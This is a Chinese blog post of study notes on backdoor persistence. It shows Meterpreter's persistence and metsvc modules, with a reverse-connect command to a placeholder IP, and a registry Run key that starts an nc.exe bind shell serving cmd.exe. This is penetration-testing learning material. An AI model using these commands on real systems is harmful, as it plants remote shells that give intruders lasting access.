后门权限维持学习笔记1

2020-04-26 16:35:12 浏览数 (1)

文章源自【字节脉搏社区】

作者-阿盟

Presistence模块实现持久后门

1.1 Presistence模块简介

Meterpreter的脚本persistence.rb,他将创建一个meterprer服务,即使远程主机再次启动,该脚本依然可以让主机重新连接远程的攻击端口,由于meterpreter不需要身份验证,这也导致任何发现端口的黑客也可利用此渠道进入后门,在真实情况下,建议完成任务后尽快自行清理。

在获取主机session后,可以通过”-h”查看哪些选项可用:

1.2 测试过程

配置持续Meterpreter会话,以等待用户登录到远程系统,并尝试每5秒钟在端口17722上的IP地址xx.xx.xx.xx连接回监听器。命令如下:

run persistence -U -i 5 -p 17722 -r xx.xx.xx.xx

通过提示判断,该组件主要是在c盘temp下建立一个vbs文件,在注册表中设置,开机启动该vbs脚本。重启主机并验证是否重连,发现开启监听端口后,主机重新连接了端口,产生了session:

1.3 注意事项

每次使用该模块,msf会自动生成一个rc文件,执行该文件的命令,可删除目标机器中的vbs脚本,防止对目标系统造成一些后续影响,建议在渗透测试结束后执行该操作。

NC 注册表实现持久后门

2.1 使用msf导入NC.exe

reg enumkey -k

HKLM\software\microsoft\windows\currentversion\run

nc添加进去,以及连接的端口,连接cmd.exe:

reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d 'C:windowssystem32nc.exe -Ldp 17722 -e cmd.exe'

查看注册表对应nc键值的信息:

reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc

确定重启后目标系统开机是否正常运行nc.exe:

Metsvc注模

metsvc,是一个Merterpreter集成的脚本,与反弹shell不同,他是在目标机器上,本地监听一个端口,默认的是31337端口,将执行的文件放到指定的目录下,并且将自己安装成一个系统服务,系统服务的名称是metsvc.exe,之后的每次启动,该服务都会自动运行。

执行 run metsvc -A

向目标主机上传功能组件,重启并查看目标主机的服务和进程。发现存在mstsvc的后台进程

查看目标主机的31337端口是否开放:

由于31337端口无法更改,因此会受到服务器安全组限制,往往无法实际应用。

我整理了一个导图,后续会继续学习权限维持方面的知识,希望各位师傅,看到了,指点指点,有些技术过时了,可能就不需要写了。

水了一期,待我准备准备,后续写更加用心的。

0 人点赞